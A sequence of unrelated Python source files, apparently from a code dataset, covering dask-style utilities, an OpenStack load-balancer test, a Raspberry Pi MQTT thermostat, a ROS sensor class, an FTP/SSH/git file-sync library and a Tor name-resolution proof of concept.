>>> parse_timedelta(timedelta(seconds=3)) # also supports timedeltas
3
"""
if isinstance(s, timedelta):
return s.total_seconds()
if isinstance(s, Number):
s = str(s)
s = s.replace(' ', '')
if not s[0].isdigit():
s = '1' + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:] or default
n = float(prefix)
multiplier = timedelta_sizes[suffix.lower()]
result = n * multiplier
if int(result) == result:
result = int(result)
return result
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c))
for x, c in zip(zip(*rows), columns))
row_template = ('|' + (' %%-%ds |' * len(columns))) % widths
header = row_template % tuple(columns)
bar = '+%s+' % '+'.join('-' * (w + 2) for w in widths)
data = '\n'.join(row_template % r for r in rows)
return '\n'.join([bar, header, bar, data, bar])
if PY2:
def nbytes(frame, _bytes_like=(bytes, bytearray, buffer)): # noqa: F821
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
elif isinstance(frame, memoryview):
if frame.shape is None:
return frame.itemsize
else:
return functools.reduce(operator.mul, frame.shape,
frame.itemsize)
else:
return frame.nbytes
else:
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def PeriodicCallback(callback, callback_time, io_loop=None):
"""
Wrapper around tornado.IOLoop.PeriodicCallback, for compatibility
with removal of the `io_loop` parameter in Tornado 5.0.
"""
if tornado.version_info >= (5,):
return tornado.ioloop.PeriodicCallback(callback, callback_time)
else:
return tornado.ioloop.PeriodicCallback(callback, callback_time, io_loop)
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print('TIME WARNING', text, end - start)
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
def format_time(n):
""" format integers as time
>>> format_time(1)
'1.00 s'
>>> format_time(0.001234)
'1.23 ms'
>>> format_time(0.00012345)
'123.45 us'
>>> format_time(123.456)
'123.46 s'
"""
if n >= 1:
return '%.2f s' % n
if n >= 1e-3:
return '%.2f ms' % (n * 1e3)
return '%.2f us' % (n * 1e6)
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, **kwargs):
n = kwargs.pop('n', 10000)
self.deque = deque(maxlen=n)
super(DequeHandler, self).__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
""" Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
# Only bother if asyncio has been loaded by Tornado
if 'asyncio' in sys.modules and tornado.version_info[0] >= 5:
jupyter_event_loop_initialized = False
if 'notebook' in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
jupyter_event_loop_initialized = (
traitlets.config.Application.initialized() and
isinstance(traitlets.config.Application.instance(), NotebookApp)
)
if not jupyter_event_loop_initialized:
import asyncio
import tornado.platform.asyncio
asyncio.set_event_loop_policy(tornado.platform.asyncio.AnyThreadEventLoopPolicy())
def has_keyword(func, keyword):
if PY3:
return keyword in inspect.signature(func).parameters
else:
# https://stackoverflow.com/questions/50100498/determine-keywords-of-a-tornado-coroutine
if gen.is_coroutine_function(func):
func = func.__wrapped__
return keyword in inspect.getargspec(func).args
if lru_cache:
has_keyword = lru_cache(1000)(has_keyword)
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = ['#440154', '#471669', '#472A79', '#433C84', '#3C4D8A', '#355D8C',
'#2E6C8E', '#287A8E', '#23898D', '#1E978A', '#20A585', '#2EB27C',
'#45BF6F', '#64CB5D', '#88D547', '#AFDC2E', '#D7E219', '#FDE724']
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
def iscoroutinefunction(f):
if gen.is_coroutine_function(f):
return True
if sys.version_info >= (3, 5) and inspect.iscoroutinefunction(f):
return True
return False
|
test_ceate_listener.py | # -*- coding: utf-8 -*-
"""
Web Console Api Client
"""
# from django.test import TestCase
# from api_tests.test_api_request import RequestClient
# from BareMetalControllerBackend.conf.env import env_config
from baremetal_service import handler
# from common.lark_common.model.common_model import ResponseObj
# from rest_framework import viewsets
import threading
from common import utils
import time
from django.test import TestCase
class testLb(TestCase):
def delete_test1(self):
openstack_client = utils.get_admin_client()
pool_delete = openstack_client.load_balancer.delete_pool("17ba943d-1d96-40d5-a2ed-b017f43e4ae5")
def update_test1(self):
openstack_client = utils.get_admin_client()
pool_update = openstack_client.load_balancer.update_pool("ab82c371-5d4d-4f5b-a721-fad9f89ba10e",
name="ding_test_update")
def test(self):
threads = []
threads.append(threading.Thread(target=self.update_test1()))
threads.append(threading.Thread(target=self.delete_test1()))
for t in threads:
print("%s: %s" % (t, time.ctime(time.time())))
t.start()
print("删除成功")
|
main.py | from thermostat import thermostat
import RPi.GPIO as GPIO
import threading
import time
import paho.mqtt.client as mqtt
import argparse
import os
def thread2():
global thermostat_obj
while True:
if thermostat_obj.valid_list():
l = thermostat_obj.get_list()
for a, b in l:
GPIO.output(int(args.thermostat_pin_a), a)
GPIO.output(int(args.thermostat_pin_b), b)
time.sleep(float(args.thermostat_delay))
def thread1():
global client
while True:
client.on_connect = on_connect
client.on_message = on_message
try_to_connect = True
while try_to_connect:
try:
client.connect(args.mqtt_server_ip, int(args.mqtt_server_port), 60)
try_to_connect = False
break
except Exception as e:
print(e)
# Blocking call that processes network traffic, dispatches callbacks and
# handles reconnecting.
# Other loop*() functions are available that give a threaded interface and a
# manual interface.
client.loop_forever()
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected with result code "+str(rc))
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
client.subscribe(args.mqtt_topic_set_temperature)
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
global thermostat_obj
print(msg.topic + " "+ msg.payload.decode("utf-8"))
if msg.topic == args.mqtt_topic_set_temperature:
temperature = float(msg.payload.decode("utf-8"))
thermostat_obj.set_temperature(temperature)
hours = time.strftime("%H")
minutes = time.strftime("%M")
seconds = time.strftime("%S")
client.publish(args.mqtt_topic_ack_temperature, hours + ":" + minutes + ":" + seconds, qos=0, retain=False)
# Argparse
parser = argparse.ArgumentParser()
parser.add_argument("--mqtt_server_ip", help="")
parser.add_argument("--mqtt_server_port", help="")
parser.add_argument("--mqtt_topic_set_temperature", help="")
parser.add_argument("--mqtt_topic_ack_temperature", help="")
parser.add_argument("--thermostat_pin_a", help="")
parser.add_argument("--thermostat_pin_b", help="")
parser.add_argument("--thermostat_delay", help="")
args = parser.parse_args()
GPIO.setmode(GPIO.BOARD)
GPIO.setup(int(args.thermostat_pin_a), GPIO.OUT)
GPIO.setup(int(args.thermostat_pin_b), GPIO.OUT)
thermostat_obj = thermostat()
client = mqtt.Client()
t1= threading.Thread(target=thread1)
t2= threading.Thread(target=thread2)
t1.start()
time.sleep(1)
t2.start()
|
class_ros_sensor.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
PHM Ros Sensor Class
"""
import rospy
from threading import Thread
import roslib.message
import roslib.names
class ROSSensor:
"""
Ros Sensor Class
"""
def __init__(self, topic):
self.name = topic
self.error = None
self.data = None
self.topic_message_type = None
self.thread = Thread(target=self.main_func, args=(self.name,))
self.thread.start()
def main_func(self, topic):
"""
Ros Sensor Main Function
"""
try:
topic_type, real_topic, fields = self.get_topic_type(topic)
if topic_type is not None:
data_class = roslib.message.get_message_class(topic_type)
self.topic_message_type = str(data_class)
rospy.Subscriber(real_topic, data_class, self._ros_cb)
else:
print("Can not resolve topic type of %s" % topic)
except ValueError as err:
print("ROSSensor Class Error!\n")
print(err)
def _ros_cb(self, msg):
"""
Ros Sensor Callback Function
"""
try:
if "sensor_msgs.msg._Temperature.Temperature" in self.topic_message_type:
self.data = msg.temperature
elif "agv_msgs.msg._CurrentData.CurrentData" in self.topic_message_type:
self.data = msg.current_data
elif "agv_msgs.msg._VoltageData.VoltageData" in self.topic_message_type:
self.data = msg.voltage_data
elif "agv_msgs.msg._PowerData.PowerData" in self.topic_message_type:
self.data = msg.power_data
elif "std_msgs" in self.topic_message_type:
self.data = msg.data
else:
self.data = None
except AttributeError as err:
print("Invalid topic spec [%s]: %s" % (self.name, str(err)))
def stop_thread_func(self):
"""
Ros Sensor Stop Thread Function
"""
self.thread.join()
self.thread.should_abort_immediately = True
@classmethod
def _get_topic_type(cls, topic):
"""
Private Get Topic Type Function
"""
try:
val = rospy.get_published_topics()
except Exception as err:
print("unable to get list of topics from master")
print(err)
matches = [(tpc, t_type) for tpc, t_type in val if tpc == topic or topic.startswith(tpc + '/')]
if matches:
tpc, t_type = matches[0]
if t_type == roslib.names.ANYTYPE:
return None, None, None
if t_type == topic:
return t_type, None
return t_type, tpc, topic[len(tpc):]
else:
return None, None, None
def get_topic_type(self, topic):
"""
Get Topic Type Function
"""
try:
topic_type, real_topic, rest = self._get_topic_type(topic)
if topic_type:
return topic_type, real_topic, rest
else:
return None, None, None
except Exception as err:
print("get_topic_type Error!")
print(err)
|
locations.py | from taters import lazy_file, pipe, read_all, read_all_to, tee
import errno
import ftplib
import furl
import os
import paramiko
import tarfile
import urllib
import sh
import socket
import stat
import threading
def _parse_url( url ):
return furl.furl( url )
def _decode_furl_path( path ):
'''decodes furl.Path to unicode string'''
return urllib.unquote( str( path ) ).decode( 'utf8' )
class location( object ):
'''Base Location'''
def __init__( self, url ):
if isinstance( url, basestring ):
url = _parse_url( url )
self.url = url
def sub_location( self, path ):
url = self.url.copy().add( path = path )
return self.__class__( url )
def _full_path( self, path ):
return _decode_furl_path( self.url.copy().path.add( path ) )
def _listdir( self ):
raise NotImplemented
def isdir( self, path ):
raise NotImplemented
def mkdirs( self, path ):
raise NotImplemented
def open( self, path, *a, **kw ):
raise NotImplemented
def stat( self, path ):
raise NotImplemented
def exists( self, path ):
raise NotImplemented
def get( self, path ):
raise NotImplemented
def put( self, f ):
raise NotImplemented
def rm( self, f ):
raise NotImplemented
def source( self, recursive = False ):
for path in self._listdir():
if self.isdir( path ):
if recursive:
for f in self.sub_location( path ).source( True ):
yield f.rename( os.path.join( path, f.name ) )
else:
yield self.get( path )
def _overwrite( self, overwrite, f ):
return overwrite( self, f ) if callable( overwrite ) else overwrite
def destination( self, files, overwrite = False ):
for f in files:
if f.delete:
self.rm( f )
elif overwrite == True or not self.exists( f.name ) or self._overwrite( overwrite, f ):
self.put( f )
class local( location ):
'''Local Location
Represents a location on your local filesystem'''
def __init__( self, url = '.' ):
super( local, self ).__init__( url )
def _listdir( self ):
for path in os.listdir( _decode_furl_path( self.url.path ) ):
yield path
def isdir( self, path ):
return os.path.isdir( self._full_path( path ) )
def mkdirs( self, path ):
os.makedirs( self._full_path( path ) )
def open( self, path, *a, **kw ):
return open( self._full_path( path ), *a, **kw )
def stat( self, path ):
return os.stat( self._full_path( path ) )
def exists( self, path ):
return os.path.exists( self._full_path( path ) )
def get( self, path ):
f = lazy_file( self._full_path( path ) )
f.name = path
return f
def put( self, f ):
print 'local:%s' % f.name
# Ensure dest paths exist
dirpath = os.path.dirname( f.name )
if not self.exists( dirpath ):
self.mkdirs( dirpath )
with open( self._full_path( f.name ), 'wb' ) as dest:
read_all_to( f, dest.write )
def rm( self, f ):
print 'local DELETE', f.name
try:
os.remove( self._full_path( f.name ) )
except OSError:
pass
class remote( location ):
'''Base Remote Location'''
def __init__( self, url ):
super( remote, self ).__init__( url )
self._con = None
@property
def con( self ):
if not self._con:
self.connect()
return self._con
def sub_location( self, path ):
loc = super( remote, self ).sub_location( path )
loc._con = self._con
return loc
def connect( self ):
pass
class BadPassiveFTP( ftplib.FTP ):
'''Use this instead of ftplib.FTP if the ftp server requires passive mode'''
def makepasv(self):
host, port = ftplib.FTP.makepasv( self )
return socket.gethostbyname( self.host ), port
class ftp( remote ):
'''FTP Location
Represents a location on an FTP server'''
def __init__( self, url, passive = True, bad_passive_server = False, timeout = socket._GLOBAL_DEFAULT_TIMEOUT, retries = 3 ):
super( ftp, self ).__init__( url )
self.bad_passive_server = bad_passive_server
self.passive = passive
self.timeout = timeout
self.retries = retries
def connect( self ):
print 'C', self.url.url
if self.bad_passive_server:
self._con = ftplib.FTP( timeout = self.timeout )
else:
self._con = BadPassiveFTP( timeout = self.timeout )
self._con.connect( self.url.host, self.url.port )
self._con.login( urllib.unquote( self.url.username ), urllib.unquote( self.url.password ) )
self._con.set_pasv( self.passive )
def _remote_path( self, f ):
return os.path.join( self.url.path, os.path.dirname( f.name ) )
def _listdir( self ):
for path in self.con.nlst( _decode_furl_path( self.url.path ) ):
if path in [ '.', '..' ]:
continue
yield path
def isdir( self, path ):
full_path = self._full_path( path )
try:
self.con.cwd( full_path )
except ftplib.error_perm, e:
if e.message.endswith( 'Not a directory' ):
return False
raise e
return True
def _retry( self, func, *a, **kw ):
for t in range( self.retries ):
try:
func( *a, **kw )
except socket.timeout:
if t < self.retries:
print 'Timedout! Retrying (%s of %s)' % ( t + 1, self.retries - 1 )
continue
else:
print 'Timedout! Out of retries!'
raise
else:
break
def exists( self, path ):
try:
self.con.size( self._full_path( path ) )
except:
return False
return True
def get( self, path ):
print 'G', path
p = pipe( path )
full_path = self._full_path( path )
def run():
p.need_data.wait()
try:
self.con.cwd( os.path.dirname( full_path ) )
self._retry( self.con.retrbinary, 'RETR %s' % os.path.basename( full_path ), p.w.write )
except Exception as e:
p.w.write( e )
p.w.close()
threading.Thread( target = run ).start()
return p.r
def put( self, f ):
print 'P', f.name
dir_path = os.path.dirname( self._full_path( f.name ) )
try:
self.con.cwd( dir_path )
except ftplib.error_perm as e:
if e.message.startswith( '550' ):
self.mkdirs( os.path.dirname( f.name ) )
self.con.cwd( dir_path )
print '%s:%s' % ( self.url.host, f.name )
self._retry( self.con.storbinary, 'STOR %s' % os.path.basename( f.name ), f )
def rm( self, f ):
print 'R', f.name
dir_path = os.path.dirname( self._full_path( f.name ) )
try:
self.con.cwd( dir_path )
except Exception, e:
print 'FTP-ERROR: Could not change directory to', os.path.dirname( f.name )
print e
print 'FTP-ERROR: Could not delete', f.name
return
try:
print '%s DELETE %s' % ( self.url.host, f.name )
self.con.delete( os.path.basename( f.name ) )
except Exception, e:
print 'FTP-ERROR: Could not delete', f.name
print e
def mkdirs( self, path ):
full_path = self._full_path( path )
if full_path.startswith( '/' ):
full_path = full_path[1:]
if not full_path:
return
self.con.cwd( '/' )
last_existed = True
for segment in full_path.split( os.sep ):
if not last_existed or segment not in self.con.nlst():
print '+D', segment
self._retry( self.con.mkd, segment )
last_existed = False
self.con.cwd( segment )
class ssh( remote ):
'''SSH Location
Represents a location on an SSH server'''
__sftp_con = None
@property
def _sftp_con( self ):
if not self.__sftp_con:
self.__sftp_con = self.con.open_sftp()
return self.__sftp_con
def connect( self ):
print 'C', self.url.url
self._con = paramiko.SSHClient()
self._con.set_missing_host_key_policy( paramiko.AutoAddPolicy() )
args = {}
if self.url.port:
args['port'] = self.url.port
if self.url.username:
args['username'] = self.url.username
if self.url.password:
args['password'] = self.url.password
self._con.connect( self.url.host, **args )
def _listdir( self ):
for file_attrs in self._sftp_con.listdir_iter( _decode_furl_path( self.url.path ) ):
yield file_attrs.filename
def isdir( self, path ):
return stat.S_ISDIR( self._sftp_con.stat( self._full_path( path ) ).st_mode )
def exists( self, path ):
full_path = self._full_path( path )
try:
self._sftp_con.stat( full_path )
except IOError, e:
if e.errno == errno.ENOENT:
return False
raise
else:
return True
def get( self, path ):
full_path = self._full_path( path )
print 'G', path
p = pipe( path )
def run():
p.need_data.wait()
sftp = self.con.open_sftp()
try:
sftp.getfo( full_path, p.w, callback = self.report_progress )
except Exception as e:
p.w.write( e )
p.w.close()
threading.Thread( target = run ).start()
return p.r
def put( self, f ):
print 'P', f.name
sftp = self.con.open_sftp()
dir_path = os.path.dirname( f.name )
if not self.exists( dir_path ):
self.mkdirs( dir_path )
full_path = self._full_path( f.name )
sftp.putfo( f, full_path, callback = self.report_progress )
def report_progress( self, prog, of ):
print '%s of %s\r' % ( prog, of ),
def rm( self, f ):
print 'R', f.name
sftp = self.con.open_sftp()
try:
sftp.remove( self._full_path( f.name ) )
except IOError:
# Most likely file does not exist, no need to remove it then
pass
def mkdirs( self, path ):
sftp = self.con.open_sftp()
full_path = self._full_path( path )
if full_path.startswith( '/' ):
sftp.chdir( '/' )
full_path = full_path[1:]
cur_path = ''
last_existed = True
for p in full_path.split( os.sep ):
cur_path = os.path.join( cur_path, p )
if last_existed:
try:
sftp.stat( cur_path )
continue
except IOError:
pass
last_existed = False
print '+D', cur_path
sftp.mkdir( cur_path )
class git( local ):
'''GIT Location
Represents a local git repository. Allows you to limit the files given in the source to files that where changed between two git revisions'''
def __init__( self, url = '' ):
super( git, self ).__init__( url )
if self.url.path:
self.git = sh.git.bake( '-C', _decode_furl_path( self.url.path ) )
else:
self.git = sh.git
def get_ref_commit( self, ref = 'HEAD' ):
return str( self.git( 'rev-parse', ref ) ).strip()
def get_current_commit( self ):
try:
return str( self.git.describe() ).strip()
except sh.ErrorReturnCode_128:
return self.get_ref_commit()
def _maybe_decode_unusual( self, name ):
if name.startswith( '"' ):
# Path is escaped due to "unusual" characters, unescape it (see git-config's man page under core.quotePath)
return name[1:-1].decode('string-escape')
return name
def _listdir( self, from_commit = None, to_commit = None ):
if from_commit is None:
# List all files
for f in self.git( "ls-tree", "--name-only", '-r', to_commit or 'HEAD', _iter = True, _tty_out = False ):
yield 'A', self._maybe_decode_unusual( f.strip() )
else:
# List only changed files
args = [ '--name-status', '--no-renames', '--color=never', from_commit ]
if to_commit:
args.append( to_commit )
for f in self.git.diff( *args, _iter = True, _tty_out = False ):
action, f = f.strip().split( '\t' )
yield action, self._maybe_decode_unusual( f )
def source( self, from_commit = None, to_commit = None, recursive = False, include_version = False ):
for mode, fname in self._listdir( from_commit, to_commit ):
if mode != 'D' and recursive and self.isdir( fname ):
# Encountered a submodule in recursive mode
# Work out its from and to commits and yield the changed files
if not self.exists( os.path.join( fname, '.git' ) ):
raise Exception, 'Submodule %s not checked out!' % fname
sub_from = self.git( 'ls-tree', from_commit, fname ) if from_commit else None
sub_from = sub_from.split()[2] if sub_from else None
sub_to = self.git( 'ls-tree', to_commit, fname ).split()[2] if to_commit else None
for f in self.sub_location( fname ).source( sub_from, sub_to, recursive ):
yield f.rename( os.path.join( fname, f.name ) )
continue
f = self.get( fname )
if mode == 'D':
f.delete = True
yield f
if include_version:
p = pipe( '.version' )
if to_commit:
p.w.write( to_commit )
else:
p.w.write( self.get_current_commit() )
p.w.close()
yield p.r
class file_location( location ):
def __init__( self, f ):
self.f = f
def open( self ):
pass
class tar( file_location ):
'''Tar file Location
Represents the files inside a tar archive as a location, allowing files to be extracted or zipped up.
NOTE: Beware of using this with large pipe-based files, anything larger than taters.pipe.chunk_max (8MiB by default) will most likely cause unknown issues.
TODO: Fix me!'''
def __init__( self, f ):
self.f = f
def open( self, mode ):
self.tar = tarfile.open( fileobj = self.f, mode = mode )
def source( self ):
self.open( 'r|*' )
for tarinfo in self.tar:
yield tar.extractfile( tarinfo )
def destination( self, files ):
self.open( 'w|gz' )
for f in files:
tarinfo = tarfile.TarInfo( f.name )
if isinstance( f, pipe._reader ):
# It's a pipe, so tee it and read all it's data to get size
# Not ideal, and will break on files larger than pipe's chunk_max, but will work for now
f1, f2 = tee( f )
tarinfo.size = len( read_all( f1 ) )
self.tar.addfile( tarinfo, f2 )
else:
f.read(0)
tarinfo.size = f.size
self.tar.addfile( tarinfo, f )
class zip( file_location ):
'''Zip file Location
Represents the files inside a zip archive as a location, allowing files to be extracted or zipped up.
TODO: Implement me!'''
# Use zip
# https://docs.python.org/2/library/zip.html
pass
|
poc.py | # note: this needs stem to run. you can
# install it in a fresh virtualenv on Debian (after "apt-get install
# python-virtualenv") like so:
#
# virtualenv venv
# source venv/bin/activate
# pip install --upgrade pip
# pip install stem
#
# Then you can run this:
# python3 poc.py
#
# ...and then visit any .onion address, and it'll get re-directed to
# txtorcon documentation.
import os
import subprocess
import sys
import time
import itertools
from copy import deepcopy
from os.path import join, split
from threading import Thread
import stem
from stem.control import EventType, Controller
from settings_services import _service_to_command
from settings_port import tor_control_port
class NameLookupError(Exception):
def __init__(self, status):
self.status = status
msg = {
0: 'The name resolution was successful',
1: 'Name resolution generic failure',
2: 'Name tld not recognized',
3: 'Name not registered',
4: 'Name resolution timeout exceeded',
}
super(NameLookupError, self).__init__(msg[status])
class _TorNameServiceProtocol(object):
delimiter = '\n'
def __init__(self, tor, process):
self._queries = dict()
self._id_gen = itertools.count(1)
self._tor = tor
self._process = process
def watch_stdout(self):
for line in self._process.stdout:
self.lineReceived(line)
def lineReceived(self, line):
args = line.split()
if args[0] == 'RESOLVED':
# Answer might contain whitespace if it's an error message; if so,
# len(answer) will be greater than 1.
query_id, status, answer = args[1], args[2], args[3:]
query_id = int(query_id)
status = int(status)
try:
stream_id = self._queries[query_id]
del self._queries[query_id]
except KeyError:
print("No query {}: {}".format(query_id, self._queries.keys()))
if status == 0:
# Answer should be a domain name or IP address, neither of
# which will contain whitespace, so only take the first
# whitespace-separated token.
answer = answer[0]
self._tor.msg('REDIRECTSTREAM ' + stream_id + ' ' + answer)
try:
self._tor.attach_stream(stream_id, 0)
except stem.UnsatisfiableRequest:
pass
else:
self._tor.close_stream(stream_id, stem.RelayEndReason.RESOLVEFAILED)
def request_lookup(self, stream_id, name):
query_id = next(self._id_gen)
self._queries[query_id] = stream_id
self._process.stdin.write('RESOLVE {} {}\n'.format(query_id, name))
def spawn_name_service(tor, name):
try:
args = _service_to_command[name]
except KeyError:
raise Exception(
"No such service '{}'".format(name)
)
spawn_env = deepcopy(os.environ)
spawn_env.update({
'TOR_NS_STATE_LOCATION': '/var/lib/tor/ns_state',
'TOR_NS_PROTO_VERSION': '1',
'TOR_NS_PLUGIN_OPTIONS': '',
})
process = subprocess.Popen(args, bufsize=1, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, env=spawn_env)
proto = _TorNameServiceProtocol(tor, process)
t = Thread(target=proto.watch_stdout)
t.start()
return proto
class _Attacher(object):
def __init__(self, tor):
self._tor = tor
self._services = {}
def maybe_launch_service(self, name):
suffix = None
srv = None
for candidate_suffix in _service_to_command:
if name.endswith("." + candidate_suffix):
suffix = candidate_suffix
srv = self._services.get(suffix, None)
break
if srv is None:
srv = spawn_name_service(self._tor, suffix)
self._services[suffix] = srv
return srv
def attach_stream(self, stream):
print("attach_stream {}".format(stream))
# Not all stream events need to be attached.
# TODO: check with Tor Project whether NEW and NEWRESOLVE are the correct list.
if stream.status not in [stem.StreamStatus.NEW, stem.StreamStatus.NEWRESOLVE]:
return
try:
srv = self.maybe_launch_service(stream.target_address)
except Exception:
print("Unable to launch service for '{}'".format(stream.target_address))
try:
self._tor.attach_stream(stream.id, 0)
except stem.UnsatisfiableRequest:
pass
return
srv.request_lookup(stream.id, stream.target_address)
def main():
while True:
try:
# open main controller
controller = Controller.from_port(port = tor_control_port)
break
except stem.SocketError:
time.sleep(0.005)
controller.authenticate()
print("[notice] Successfully connected to the Tor control port.")
if controller.get_conf('__LeaveStreamsUnattached') != '1':
sys.exit('[err] torrc is unsafe for name lookups. Try adding the line "__LeaveStreamsUnattached 1" to torrc-defaults')
attacher = _Attacher(controller)
controller.add_event_listener(attacher.attach_stream, EventType.STREAM)
print('[debug] Now monitoring stream connections.')
try:
# Sleeping for 365 days, as upstream OnioNS does, appears to be incompatible with Windows.
# Therefore, we instead sleep for 1 day inside an infinite loop.
while True:
time.sleep(60 * 60 * 24 * 1) #basically, wait indefinitely
except KeyboardInterrupt:
print('')
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.